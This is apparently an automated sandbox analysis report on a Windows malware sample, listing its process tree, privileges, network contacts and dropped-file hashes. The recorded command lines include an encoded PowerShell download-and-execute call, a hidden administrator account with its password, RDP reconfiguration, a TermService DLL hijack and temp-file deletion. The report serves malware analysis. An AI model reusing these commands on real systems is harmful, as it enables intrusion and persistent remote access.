185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1084 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1084 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1084 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1472 wrote to memory of 1752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1472 wrote to memory of 1752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1752 wrote to memory of 1348 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1752 wrote to memory of 1348 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1752 wrote to memory of 1348 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1472 wrote to memory of 924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1472 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1472 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1472 wrote to memory of 2024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 2024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 2024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1472 wrote to memory of 1360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 1360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 1360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1472 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1472 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1472 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1424 wrote to memory of 892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1424 wrote to memory of 892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1424 wrote to memory of 892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1472 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1472 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1472 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1612 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1612 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1612 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe

"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FB1.tmp" "c:\Users\Admin\AppData\Local\Temp\jwos05d0\CSC22ABBD0B181D470C8ADE18864EE5B39D.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc x2ZZlQ39 /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc x2ZZlQ39 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39 /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc x2ZZlQ39

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc x2ZZlQ39

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 sadiviai9d9asd.xyz udp
N/A 194.180.174.20:443 sadiviai9d9asd.xyz tcp

Files

memory/1084-60-0x0000000041760000-0x0000000041B80000-memory.dmp

memory/1084-63-0x00000000410C4000-0x00000000410C6000-memory.dmp

memory/1084-62-0x00000000410C2000-0x00000000410C4000-memory.dmp

memory/1084-64-0x00000000410C6000-0x00000000410C7000-memory.dmp

memory/1084-65-0x00000000410C7000-0x00000000410C8000-memory.dmp

memory/1472-66-0x0000000000000000-mapping.dmp

memory/1472-67-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

memory/1472-68-0x0000000002030000-0x0000000002031000-memory.dmp

memory/1472-69-0x000000001AB60000-0x000000001AB61000-memory.dmp

memory/1472-70-0x00000000026D0000-0x00000000026D1000-memory.dmp

memory/1472-71-0x0000000002780000-0x0000000002781000-memory.dmp

memory/1472-72-0x000000001AAE0000-0x000000001AAE2000-memory.dmp

memory/1472-73-0x000000001AAE4000-0x000000001AAE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/1472-75-0x000000001B6E0000-0x000000001B6E1000-memory.dmp

memory/1752-76-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.cmdline

MD5 eb35bcbf52d2a566d4024c8ed0373a6d
SHA1 3b594ae69e2a4967fd51034274e4dfa2bdd3ac9d
SHA256 487cb491e5217c0e812f1111587d5c1a084ed887d9d8adc5a1fd55e8c7956b63
SHA512 d4d277c1b00179f5b3ee2b99bc32b506b16c92862d2a2f54ed37968cc77368b8809c4a8c4161d760cca34bbf830b47d72ed95cbd4fec0e558a4120d99409e85b

\??\c:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1348-79-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jwos05d0\CSC22ABBD0B181D470C8ADE18864EE5B39D.TMP

MD5 1cf5f91c4e61122ab89eb8413aefe0c0
SHA1 778a9e6fa082bb1df39ffb7aa906eb6366efda2e
SHA256 ccc56dcb0813869a17a42c2ca262d1c7de89b773d498b6ab69eb8de15c991af5
SHA512 b7a3e787596c5daf11ecf8d80af5441c4082fc8940973eccdde6c3436ee8eff2e20484c259619c08389a28800865d2ad93adba08c4c3c8e4ad1f73da09a30a2b

C:\Users\Admin\AppData\Local\Temp\RES1FB1.tmp

MD5 a7bc8978047c96617c041555d8a17604
SHA1 e89ea61658c7ea07593b8bece8fb04a3a121ba05
SHA256 445c20a73c3ac33c70d40e059613e911e82cc998c74f3c36a675e1cb03cf1d8b
SHA512 2f89bdc54f9ce096ca7caf07692522fd7a7e91c53275c3115c3f1f53ae1baba7a7e9b55eaab6a40504795e2ff18fd45d8f54d2ac1a4fdda29a2b19890ef9d8b0

C:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.dll

MD5 1caaa54969d3076bea968b8b4dca5c3c
SHA1 e093d0abe4ac2d0b7c9d0a777adde99067153b06
SHA256 e449575fde012c46c2513956dc393860149e60be28ca0fa84651c8de22f8462f
SHA512 dc63ff60a90fcd718986fc89f8721f13ae41207fe759862b9c4b0c1dc668ae861b3f5617233793f767264273ec858dd94e7f375f8032e4eda0c592855e0f0f10

memory/1472-83-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 90c8165a2ca1c584008751e6604aac5f
SHA1 c1b2545af59ec7acdec29e91c667aa74a12b9742
SHA256 2099da06514de677962d66f90b822084878cd4d9bb9e62bfa8c4ed728ddfa974
SHA512 9d2e477e0b600ae0d82fac78bdabfdb005033c20e28d7c76fb48111a426e315e9bb7e8da5daeb2824dc92c5e084f52aa33c1d5e680fe566c3f21d96b838799a0

memory/1472-85-0x000000001B410000-0x000000001B411000-memory.dmp

memory/1472-86-0x000000001B7B0000-0x000000001B7B1000-memory.dmp

memory/1472-87-0x000000001AAA0000-0x000000001AAA1000-memory.dmp

memory/924-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d7e64482b71d97c368bdce78ee636c43
SHA1 030e27a5cca10901d60234c02dbdee722d02169d
SHA256 8062237756a25fea76f1212c872143f31c2e8e6a16e8a0b67a2c3af77902dffb
SHA512 3897410e305194044594b21329091248d388eac5c37a1f1434425e6f90aed900307df0c189d37b8ab3a3f5599137c6d572fb98ac19632dd8402c88ee9ab376a6

memory/924-95-0x000000001AAF4000-0x000000001AAF6000-memory.dmp

memory/1472-96-0x000000001AAEA000-0x000000001AB09000-memory.dmp

memory/924-94-0x000000001AAF0000-0x000000001AAF2000-memory.dmp

memory/924-97-0x00000000025F0000-0x00000000025F1000-memory.dmp

memory/924-99-0x00000000027E0000-0x00000000027E1000-memory.dmp

memory/924-101-0x000000001B5B0000-0x000000001B5B1000-memory.dmp

memory/924-102-0x00000000024B0000-0x00000000024B1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 3c1dacbf2ce1a12cadb6624682c05a70
SHA1 662b1055be72720ff5bbabee29e76999647ec47b
SHA256 d440269a76eba5f3a0fe80445685fc783c1d76ccc3c8318a94a78d16c9e53eca
SHA512 f2e321bc780b980b3d8ec19cf4b2b832496a3ff5926dd112f35daf33b8ed3cfc456e1a5787164eb7da641b76c5af73d2e354ece7c1b98e8e6847a6af7287eebf

memory/924-107-0x000000001B980000-0x000000001B981000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5bfa02a4-56c4-4b0d-8731-ecaa84524853

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/924-120-0x000000001B8F0000-0x000000001B8F1000-memory.dmp

memory/924-121-0x000000001BAC0000-0x000000001BAC1000-memory.dmp

memory/1308-122-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d7e64482b71d97c368bdce78ee636c43
SHA1 030e27a5cca10901d60234c02dbdee722d02169d
SHA256 8062237756a25fea76f1212c872143f31c2e8e6a16e8a0b67a2c3af77902dffb
SHA512 3897410e305194044594b21329091248d388eac5c37a1f1434425e6f90aed900307df0c189d37b8ab3a3f5599137c6d572fb98ac19632dd8402c88ee9ab376a6

memory/1308-128-0x000000001A760000-0x000000001A761000-memory.dmp

memory/1308-130-0x000000001B600000-0x000000001B601000-memory.dmp

memory/1308-132-0x000000001B500000-0x000000001B501000-memory.dmp

memory/1308-133-0x0000000002460000-0x0000000002461000-memory.dmp

memory/1308-134-0x000000001A810000-0x000000001A812000-memory.dmp

memory/1308-135-0x000000001A814000-0x000000001A816000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 8c0405f79e2a29e062e070d4da07be69
SHA1 53356c43677d98b03decbe894c1dedb5cad4aa77
SHA256 f45832bb8be3512c7a893a6731fafe6df151773cedef249928386333ea71ed36
SHA512 280291c80d1ac371ab697c134dd8fe7a72afc8207ffa675495c1ff73380f25657bae124fdd087ed5711e30610b3a2094ea638cc82ce3c0922e99bba6d82b9741

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf82d09d-0553-4157-bcee-c1e6bccab36d

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1224db42-7593-4e0a-a9dd-53a802380c51

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fb426de-7576-4a4f-a8f2-82c2b3d65330

